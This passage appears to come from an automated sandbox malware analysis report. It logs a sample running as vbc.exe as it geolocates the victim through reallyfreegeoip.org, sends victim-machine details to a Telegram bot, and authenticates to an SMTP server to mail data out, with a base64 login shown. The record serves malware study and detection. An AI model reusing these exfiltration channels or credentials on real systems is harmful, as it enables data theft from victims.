2025-01-10 14:03:49 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49731	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:50 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:50 UTC	851	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832619 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j1MA5qXP2rb8aABbcw7bdgHoO5CbbotmoZ1vHjzDbFtRNThSRleZZpmU9R%2FQ97zUrtvjBZK9bTw70VyhrR6qB2bKzzHqCOIt3xeD96KAiGVGfNUCayAFThqkxzua0JGyqjsFJJJv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd3679dbe472a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2014&rtt_var=766&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1418853&cwnd=212&unsent_bytes=0&cid=5b1bf1c8556da35f&ts=158&x=0"
2025-01-10 14:03:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49732	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:50 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:50 UTC	859	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:50 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832620 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSvWbTmzscgRuotuyIzghHdbC%2FvKhEt8Ex%2B3jZUUdoXnG%2FhzJcyKsbW8I2Nhj%2BS7FUGAVZ9bp2MjjGmMvHqNwOxIqYRkvehIQbe4gm4SyKcg4cGrMCa1xTDyKx28TJqC6o%2F8aLjF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd367aef3c1a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1991&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1438423&cwnd=157&unsent_bytes=0&cid=7071d06022b9f4bd&ts=130&x=0"
2025-01-10 14:03:50 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49735	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:52 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:52 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832621 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FFKToAR1xvNHBAS6koVsiyHTn7GTeYEJFD1nxPzXTW9mQKDJcFjK6F6hY%2BFZmatNVb1TALBxQ7ZOzOAZppB1QUXN746r11OejrhkG7bqgysM6x6PaRKZtNccFV33JWc%2Bfin3hKT0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd3684cb66de9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1608&rtt_var=625&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1719670&cwnd=209&unsent_bytes=0&cid=0eef148f14a57d29&ts=152&x=0"
2025-01-10 14:03:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49736	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:52 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:52 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:52 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832621 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IWD8vpg7hrHUVkk6WiLiGJcDyWoBCKurspaOco2yXNBWVBKhFLcBnpJQ%2FBL%2Fc5Cvt3H9vrxOAUutzNduY4ZUcUN94u4EVa6cXzz7rGfUrkN%2BVSQNsK1%2FhzplAGMwOTtYoMJengtJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd36857d7dde9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1549&rtt_var=594&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1821584&cwnd=209&unsent_bytes=0&cid=62697d91fe04d6be&ts=138&x=0"
2025-01-10 14:03:52 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49737	149.154.167.220	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:53 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2021:18:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 14:03:53 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 14:03:53 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 14:03:53 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49743	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:54 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:54 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:54 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832623 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WCj7mOF0ZKvVqoW4ES23aSU0T3wzlooPZ7BPaPtj9UwqKaTvgrYEYAksGiy6FlWoJiL8XJc59OLmGec23UG5KarUi%2BCwrN8FpqZen2S6e0nXgnqANMlfU9MQ%2FXcsd02LU%2BFt8lcw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd3691df094363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1589&rtt_var=619&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1733966&cwnd=240&unsent_bytes=0&cid=a006aaa0cc84fef8&ts=148&x=0"
2025-01-10 14:03:54 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49747	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:55 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-10 14:03:55 UTC	857	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:55 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832624 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4IuexzVE%2BQJa1Ay6xad%2FuSLHVrkeXsOSzb2JnI%2BsmI1mu1lWZZPqrlPuIDdtkSGXWQCO8dGM4xtbav9JNudj%2BQAuGqV0J2Ft7wWWhpmOaIuDiDZu9108IfbJ1TcgVWVMQPtPo2gb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd36994a0372a4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1896&min_rtt=1888&rtt_var=725&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1492842&cwnd=212&unsent_bytes=0&cid=4d7559f53646cc24&ts=133&x=0"
2025-01-10 14:03:55 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49755	104.21.96.1	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:57 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:57 UTC	861	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:57 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832626 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dwGYoxBxf1b9L3URs%2FMNh0J8JL8yzcjEMK%2Fu0vd0AI5GasqThHyzgO9mXPVRwH5xUOqFzSUnghg14vpHR%2B%2BNdmw2%2F%2BMAT93NTCmRfBWJftldcYUFpNdrj6J62dVIfezTtaeXFMmu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd36a3dc0cde9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1597&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1756919&cwnd=209&unsent_bytes=0&cid=85ba8fc5921987d2&ts=136&x=0"
2025-01-10 14:03:57 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49756	149.154.167.220	443	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:58 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:179605%0D%0ADate%20and%20Time:%2010/01/2025%20/%2022:27:27%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20179605%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-10 14:03:58 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 14:03:58 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 14:03:58 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 10, 2025 15:04:02.379635096 CET	587	49787	208.91.199.223	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 10, 2025 15:04:02.379834890 CET	49787	587	192.168.2.5	208.91.199.223	EHLO 179605
Jan 10, 2025 15:04:02.527446985 CET	587	49787	208.91.199.223	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 10, 2025 15:04:02.532186031 CET	49787	587	192.168.2.5	208.91.199.223	AUTH login YWNjb3VudEBpZ2FrdWluLmNvbQ==
Jan 10, 2025 15:04:02.682446003 CET	587	49787	208.91.199.223	192.168.2.5	334 UGFzc3dvcmQ6
Jan 10, 2025 15:04:02.836429119 CET	587	49787	208.91.199.223	192.168.2.5	235 2.7.0 Authentication successful
Jan 10, 2025 15:04:02.836674929 CET	49787	587	192.168.2.5	208.91.199.223	MAIL FROM:<account@igakuin.com>
Jan 10, 2025 15:04:02.986206055 CET	587	49787	208.91.199.223	192.168.2.5	250 2.1.0 Ok
Jan 10, 2025 15:04:02.986669064 CET	49787	587	192.168.2.5	208.91.199.223	RCPT TO:<director@igakuin.com>
Jan 10, 2025 15:04:03.160634041 CET	587	49787	208.91.199.223	192.168.2.5	250 2.1.5 Ok
Jan 10, 2025 15:04:03.164448977 CET	49787	587	192.168.2.5	208.91.199.223	DATA
Jan 10, 2025 15:04:03.312763929 CET	587	49787	208.91.199.223	192.168.2.5	354 End data with <CR><LF>.<CR><LF>
Jan 10, 2025 15:04:03.318165064 CET	49787	587	192.168.2.5	208.91.199.223	.
Jan 10, 2025 15:04:03.665513992 CET	587	49787	208.91.199.223	192.168.2.5	250 2.0.0 Ok: queued as 16B7C500100
Jan 10, 2025 15:04:06.393167019 CET	587	49812	208.91.199.223	192.168.2.5	220 us2.outbound.mailhostbox.com ESMTP Postfix
Jan 10, 2025 15:04:06.395332098 CET	49812	587	192.168.2.5	208.91.199.223	EHLO 179605
Jan 10, 2025 15:04:06.545522928 CET	587	49812	208.91.199.223	192.168.2.5	250-us2.outbound.mailhostbox.com 250-PIPELINING 250-SIZE 41648128 250-VRFY 250-ETRN 250-STARTTLS 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250-DSN 250 CHUNKING
Jan 10, 2025 15:04:06.545859098 CET	49812	587	192.168.2.5	208.91.199.223	AUTH login YWNjb3VudEBpZ2FrdWluLmNvbQ==
Jan 10, 2025 15:04:06.698613882 CET	587	49812	208.91.199.223	192.168.2.5	334 UGFzc3dvcmQ6
Jan 10, 2025 15:04:06.854763985 CET	587	49812	208.91.199.223	192.168.2.5	235 2.7.0 Authentication successful
Jan 10, 2025 15:04:06.855021954 CET	49812	587	192.168.2.5	208.91.199.223	MAIL FROM:<account@igakuin.com>
Jan 10, 2025 15:04:07.020087004 CET	587	49812	208.91.199.223	192.168.2.5	250 2.1.0 Ok
Jan 10, 2025 15:04:07.063376904 CET	49812	587	192.168.2.5	208.91.199.223	RCPT TO:<director@igakuin.com>
Jan 10, 2025 15:04:07.238522053 CET	587	49812	208.91.199.223	192.168.2.5	250 2.1.5 Ok
Jan 10, 2025 15:04:07.258816004 CET	49812	587	192.168.2.5	208.91.199.223	DATA
Jan 10, 2025 15:04:07.410089016 CET	587	49812	208.91.199.223	192.168.2.5	354 End data with <CR><LF>.<CR><LF>
Jan 10, 2025 15:04:07.496866941 CET	49812	587	192.168.2.5	208.91.199.223	.
Jan 10, 2025 15:04:07.977968931 CET	587	49812	208.91.199.223	192.168.2.5	250 2.0.0 Ok: queued as 2917A50026F
Jan 10, 2025 15:05:41.782824993 CET	49787	587	192.168.2.5	208.91.199.223	QUIT
Jan 10, 2025 15:05:41.931027889 CET	587	49787	208.91.199.223	192.168.2.5	221 2.0.0 Bye
Jan 10, 2025 15:05:45.804636002 CET	49812	587	192.168.2.5	208.91.199.223	QUIT
Jan 10, 2025 15:05:45.956830025 CET	587	49812	208.91.199.223	192.168.2.5	221 2.0.0 Bye

Target ID:	0
Start time:	09:03:34
